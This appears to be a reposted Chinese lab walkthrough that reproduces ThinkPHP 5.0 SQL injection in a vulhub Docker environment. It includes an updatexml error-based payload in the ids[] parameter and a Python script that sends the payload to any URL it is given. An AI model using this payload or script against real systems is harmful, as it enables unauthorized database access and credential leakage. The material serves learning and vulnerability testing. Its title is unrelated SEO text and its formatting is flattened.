深圳网站商城制作wordpress购物系统

web/2025/9/28 12:30:55/文章来源:

深圳网站商城制作,wordpress购物系统,有限公司怎么注册,wordpress 主题移动端1 漏洞介绍 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0#xff08;5.1.23#xff09;中,开启debug模式#xff0c;传入的某参数在绑定编译指令的时候又没有安全处理#xff0c;预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式#xff0c…1 漏洞介绍 ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.05.1.23中,开启debug模式传入的某参数在绑定编译指令的时候又没有安全处理预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码 2 漏洞环境 cd vulhub/thinkphp/in-sqlinjection/ 部署环境 docker compose up -d 查看端口 docker compose ps 访问您将看到显示用户名表示环境正在成功运行。 http://192.168.135.132/index.php?ids[]1ids[]2 3 使用payload进行复现打开页面你会发现消息显示成功 http://192.168.135.132/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]1 4 编写python脚本探测漏洞 #!/usr/bin/env python import requests from urllib.parse import urljoin def thinkphp5x_sql(url):payload urljoin(url, /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]1) response requests.get(urlpayload, verifyFalse) if XPATH syntax error in response.text:print(漏洞存在)else:print(漏洞不存在) if __name__ __main__:print(注意本代码仅用于实验和学习目的请谨慎使用。)url input(请输入目标 URL: )thinkphp5x_sql(url) 结果

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/web/83332.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！